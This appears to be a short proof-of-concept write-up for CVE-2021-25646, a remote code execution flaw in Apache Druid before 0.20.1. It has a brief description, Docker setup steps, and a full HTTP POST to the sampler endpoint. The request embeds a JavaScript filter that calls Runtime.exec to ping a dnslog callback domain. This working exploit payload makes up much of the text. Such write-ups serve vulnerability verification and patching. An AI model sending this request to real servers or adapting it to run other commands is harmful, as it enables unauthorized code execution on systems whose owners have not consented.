Apache Druid sampler Remote code execution vulnerability CVE-2021-25646

Apache Druid sampler Remote code execution vulnerability CVE-2021-25646

Vulnerability Description

Apache Druid is a column-oriented open-source distributed data store written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on top of the data. Apache Druid lacks authorization authentication by default, and an attacker can send specially crafted requests to execute arbitrary code using the privileges of processes on the Druid server. Apache Druid includes code that executes user-provided JavaScript functionality embedded in various types of requests.

Vulnerability Impact

Apache Druid < 0.20.1

Environment construction

Docker is used here to build an environment

</a-alert>

After downloading, enter the directory distribution\docker

Execute the command to compile docker-compose up -d

Vulnerability reappears

Verify POC

POST /druid/indexer/v1/sampler
Content-Type: application/json

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping p3fpw5.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

</a-alert>